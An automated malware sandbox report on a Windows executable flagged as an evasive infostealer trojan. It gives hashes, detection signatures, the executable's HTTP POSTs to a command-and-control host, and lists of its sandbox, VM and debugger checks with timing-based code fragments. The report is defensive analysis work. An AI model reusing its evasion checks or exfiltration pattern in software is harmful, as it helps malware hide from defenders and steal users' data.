Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1564519
MD5: 2ba6fe9428da32103bb44c955939208d
SHA1: 145b071306f5ad32a9385ff9f89bae6a1ec968e9
SHA256: 1d64908fcbd9560615576da2b9b41ce76fafb939a0f04f559301a1946db4e936
Tags: exe, user-Bitsight

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 4688 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2BA6FE9428DA32103BB44C955939208D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: file.exe | Avira: detected
Source: file.exe | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0055DCF0: -----BEGIN PUBLIC KEY-----
Source: file.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0059A5B0: mov dword ptr [ebp+04h], 424D53FFh
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0059A7F0: mov dword ptr [ebx+04h], 424D53FFh
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0059A7F0: mov dword ptr [edi+04h], 424D53FFh
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0059A7F0: mov dword ptr [esi+04h], 424D53FFh
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0059B560: mov dword ptr [ebx+04h], 424D53FFh
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0053255D: GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005329FF: FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1; Host: httpbin.org; Accept: */*
Source: global traffic | HTTP traffic detected: POST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1; Host: home.twentykx20pt.top; Accept: */*; Content-Type: application/json; Content-Length: 557653
Source: global traffic | HTTP traffic detected: POST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1; Host: home.twentykx20pt.top; Accept: */*; Content-Type: application/json; Content-Length: 128; Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 18.213.123.165
Source: Joe Sandbox View | IP Address: 34.118.84.150
Source: Joe Sandbox View | ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005FA8C0: recvfrom
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.twentykx20pt.top
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND; server: nginx/1.22.1; date: Thu, 28 Nov 2024 12:09:58 GMT; content-type: text/html; charset=utf-8; content-length: 207; Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477
Source: file.exe, 00000000.00000002.2631723255.000000000166E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI17327684775a1
Source: file.exe, 00000000.00000003.2630054574.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2629897019.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2631723255.00000000016A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477?argument=
Source: file.exe, 00000000.00000002.2631723255.000000000166E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477fd4
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477http://home.twentykx20pt.top/AMeacCwtwXCq
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: file.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: file.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: file.exe, file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: file.exe | String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_016D43E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_016CBFC9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_016CBFA3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01711238
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0170653D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01702785
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005405B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00546FA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056F100
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FB180
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006000E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BE030
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00596210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FC320
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00600420
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00884410
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053E620
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B4780
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FC770
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00896730
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00544940
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053A960
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EC900
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00706AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007EAAC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C4B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007EAB2C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A8BF0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053CBB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BCC70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008ACD80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B4D40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F0D80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084AE30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00882F90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00554F70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FEF90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F8F90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005410E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0089D430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A35B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C1780
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E9880
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00889920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B3A70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A1BD0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00571BE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00897CC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E9C80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00545DB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00543ED0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00555EB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B9FE0
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0054CCD0 appears 55 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 005371E0 appears 47 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0070CBC0 appears 104 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0053CAA0 appears 64 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0054CD40 appears 80 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 005750A0 appears 101 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 005373F0 appears 111 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 006144A0 appears 76 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 005375A0 appears 696 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00574F40 appears 335 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 006E7220 appears 102 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00575340 appears 50 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00574FD0 appears 288 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0053C960 appears 37 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe | Static PE information: Section: dkqxmldn ZLIB complexity 0.9945288575306236
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0053255D: GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005329FF: FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: C:\Users\user\Desktop\file.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\file.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: file.exe | ReversingLabs: Detection: 31%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: file.exe | Static file information: File size 4490752 > 1048576
Source: file.exe | Static PE information: Raw size of is bigger than: 0x100000 < 0x283a00
Source: file.exe | Static PE information: Raw size of dkqxmldn is bigger than: 0x100000 < 0x1c1000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dkqxmldn:EW;ajwrokqy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dkqxmldn:EW;ajwrokqy:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: file.exeStatic PE information: real checksum: 0x44a3f0 should be: 0x44d94c
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: dkqxmldn
Source: file.exeStatic PE information: section name: ajwrokqy
Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016DD258 push edx; ret 0_3_016DD259
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016DB222 push ebp; iretd 0_3_016DB261
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016CDB14 push eax; retf 0_3_016CDB1D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016DF0AD push esi; ret 0_3_016DF0F2
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0172E691 push edx; ret 0_3_0172E692
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016DD258 push edx; ret 0_3_016DD259
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016DB222 push ebp; iretd 0_3_016DB261
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016CDB14 push eax; retf 0_3_016CDB1D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016DF0AD push esi; ret 0_3_016DF0F2
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B41D0 push eax; mov dword ptr [esp], edx | 0_2_008B41D5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B2340 push eax; mov dword ptr [esp], 00000000h | 0_2_005B2343
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EC7F0 push eax; mov dword ptr [esp], 00000000h | 0_2_005EC743
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00570AC0 push eax; mov dword ptr [esp], 00000000h | 0_2_00570AC4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00591430 push eax; mov dword ptr [esp], 00000000h | 0_2_00591433
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B39A0 push eax; mov dword ptr [esp], 00000000h | 0_2_005B39A3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058DAD0 push eax; mov dword ptr [esp], edx | 0_2_0058DAD1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B9F40 push dword ptr [eax+04h]; ret | 0_2_008B9F6F
Source: file.exe | Static PE information: section name: dkqxmldn entropy: 7.95546200906979

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: PROCMON.EXE
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: X64DBG.EXE
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WINDBG.EXE
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDFA5A second address: BDFA70 instructions: 0x00000000 rdtsc 0x00000002 js 00007F70F070E5C8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e jbe 00007F70F070E5CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D41B second address: D3D45C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB16h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F70F0BCDB1Eh 0x00000014 jmp 00007F70F0BCDB18h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D45C second address: D3D462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D462 second address: D3D468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D468 second address: D3D474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jne 00007F70F070E5C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D474 second address: D3D47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BFCB second address: D5BFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BFD1 second address: D5BFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BFD7 second address: D5BFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D3h 0x00000009 popad 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BFF5 second address: D5BFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BFFB second address: D5BFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DB21 second address: D5DB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DB26 second address: D5DB79 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F70F070E5C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d je 00007F70F070E5CCh 0x00000013 or dword ptr [ebp+122D3919h], esi 0x00000019 push 00000000h 0x0000001b call 00007F70F070E5CBh 0x00000020 jmp 00007F70F070E5D7h 0x00000025 pop edx 0x00000026 call 00007F70F070E5C9h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jno 00007F70F070E5C6h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DB79 second address: D5DB7F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DB7F second address: D5DBC2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F70F070E5D8h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jo 00007F70F070E5C8h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F70F070E5CBh 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f pushad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push edi 0x00000024 pop edi 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DBC2 second address: D5DBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DBC6 second address: D5DBEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DBEC second address: D5DBF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DBF0 second address: D5DC0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DD6D second address: D5DDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jns 00007F70F0BCDB06h 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e jp 00007F70F0BCDB17h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F70F0BCDB08h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f add dword ptr [ebp+122D1BD1h], ecx 0x00000035 push 00000000h 0x00000037 mov esi, dword ptr [ebp+122D2DDDh] 0x0000003d push 2269675Ah 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 pushad 0x00000046 popad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DDCC second address: D5DDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
